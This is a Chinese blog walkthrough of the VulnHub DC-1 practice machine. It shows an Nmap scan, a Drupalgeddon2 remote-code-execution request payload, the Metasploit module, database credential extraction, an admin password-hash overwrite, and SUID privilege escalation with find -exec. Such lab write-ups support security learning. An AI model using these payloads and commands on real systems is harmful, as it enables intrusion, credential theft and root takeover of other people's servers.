vulnhub系列:DC-1

最新推荐文章于 2024-08-16 15:00:00 发布
最新推荐文章于 2024-08-16 15:00:00 发布
阅读量307 收藏 6
点赞数 5
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141142102
版权

vulnhub系列:DC-1

靶机下载

一、信息收集

nmap 扫描存活,根据 mac 地址寻找 IP

nmap 192.168.23.0/24

nmap扫描网段

nmap 扫描端口

nmap 192.168.23.141 -p- -Pn -sV -O

nmap扫描端口

dirsearch 目录扫描

python3 dirsearch.py -u http://192.168.23.141/

目录扫描

访问80端口

80页面

查看 wappalyzer 插件信息

wappalyzer

目前基本信息

IP地址:192.168.23.141
开放端口:22、80、111、37573
Drupal 7
php 5.4.45
jQuery 1.4.4

直接搜索 Drupal 的漏洞

搜索Drupal漏洞

根据文章给出的POC尝试远程代码执行

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 192.168.23.141
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=dir

远程代码执行POC1

试着换了几个命令好像没有执行

找找目录扫描扫出来的文件或目录

发现一个token字段

theme和token

账号注册等功能的页面

账号注册等页面

二、getshell

没找到啥东西,kali 使用工具

msfconsole

msf

查找 Drupal 的 exp

search Drupal

查找exp

利用漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

use18年漏洞

查看漏洞模块参数

options

查看漏洞模块参数

可以看到 rhosts 需要填写,设置 rhosts 内容,然后查看模块

set rhosts 192.168.23.141

show options

设置被攻击IP后查看模块

设置好后攻击

run或者exploit

成功连接

run成功连接

输入 shell,执行命令

shell

shell执行命令

使用 python,提升交互性

python -c 'import pty; pty.spawn("/bin/bash")'

获取交互式shell

flag 1

查看当前目录,发现 flag1.txt,提示有一个配置文件

image-20240812191033661

flag 2

文档给出的配置文件名为 settings.php,搜索文件

cat `find / -name settings.php`

翻了翻看到 flag 2 和数据库账号密码,flag 2 提示,暴力破解和字典攻击不是唯一方法,需要访问权限,能用这些证书做什么?

dbuser:R0ck3t

setting文件得到数据库账号密码

连接数据库

mysql -u dbuser -pR0ck3t

连接数据库

进入数据库查看以下数据

show databases;

查看库名

查看 drupaldb 库下表名

use drupaldb;
show tables;

查看表名

可以看到有一个 users 表,查看一下其下数据

select * from users;

账号密码

发现 admin 和 Fred 用户,密码经过加密,update 修改密码

update users set pass=123456 where name="admin";

修改密码

页面尝试登录,登录失败,可能需要同样的加密方式

登录被限制

百度一下怎么做

image-20240812192352469

这里我用方法二,执行命令

php scripts/password-hash.sh admin

$S$D65v3m6Cw02rYa9zUwTmjtFHWy5OEneOVUyXMBjs5AxfiiNXgkYU

image-20240812193243240

得到密码 admin 的 hash 值,进入数据库修改密码

mysql -u dbuser -pR0ck3t

use drupaldb;

update users set pass="$S$D65v3m6Cw02rYa9zUwTmjtFHWy5OEneOVUyXMBjs5AxfiiNXgkYU" where name="admin";

image-20240812193440056

重新登录80端口页面,登录成功

admin:admin

image-20240812194029860

flag 3

在图中位置发现 flag 3,特殊的 PERMS 能帮我找到密码,提示 -exec,应该是要 suid 提权

image-20240812193916970

image-20240812193939469

三、提权

查看 suid 权限的可执行程序

find / -perm -4000 2>/dev/null

image-20240812194451524

依次寻找测试,find 可利用,提权成功

find / -name flag1.txt -exec "/bin/bash" -p \; -quit

image-20240812195458173

在 root 目录下发现 thefinalflag.txt ,查看内容

image-20240812195644617

flag 4

在 home 目录下发现 flag4.txt

image-20240812200105405

三天三夜睡不着
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3618
前言 这次练习的靶机是vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4493
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
Vulnhub靶机:DC-1渗透详细过程
菜鸟学渗透
04-01 749
Vulnhub靶机:DC-1渗透详细过程
Vulnhub系列DC-1
weixin_41064688的博客
01-09 664
Vulnhub系列DC-1 第一次尝试写 Description DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in the world of penetration testing. It was designed to be a challenge for beginners, b...
Vulnhub靶机:DC-4渗透详细过程
菜鸟学渗透
04-29 375
Vulnhub靶机:DC-4渗透详细过程
vulnhub靶机-DC系列-DC-1
qq_45953122的博客
08-08 198
DC-1详解
Vulnhub系列DC-2
jq_j37的博客
08-07 298
Vulnhub系列DC-2靶机,打靶文章
vulnhub系列DC-9
jq_j37的博客
08-12 431
vulnhub系列DC-9靶机,打靶文章
Vulnhub靶机:DC-3渗透详细过程
菜鸟学渗透
04-11 866
Vulnhub靶机:DC-3渗透详细过程
VulnHub系列DC- 1-Walkthrough.pdf
10-30
VulnHub系列DC: 1-Walkthrough,内附工具、知识点和漏洞靶场地址。图文并茂
vulnhub靶场实战系列-DC-3实战
05-20
vulnhub靶场实战系列-DC-3实战
vulnhub靶场实战系列-DC-1实战流程图
05-17
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
怎么在网络攻击中屹立不倒
dexun123的博客
08-12 694
在当今蓬勃发展的网络游戏产业中,服务器安全无疑是企业生存与发展的基石。面对互联网环境中无处不在的DDoS(分布式拒绝服务)与CC(挑战碰撞)攻击威胁,游戏服务器的防御能力与高效处理能力显得尤为重要。相较于追求综合性能平衡的普通服务器,游戏服务器必须专注于构建坚不可摧的安全防线与流畅无阻的游戏体验,以抵御外部侵扰,确保玩家沉浸于无缝的游戏世界。
Animetronic - hackmyvm
tanbinn的博客
08-12 480
hackmyvm的Animetronic靶场
网络协议八 网络安全相关
hunandede的博客
08-12 432
ARP欺骗的防护原理。
网络安全(黑客)自学
最新发布
白帽子凯哥聊黑客
08-16 768
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值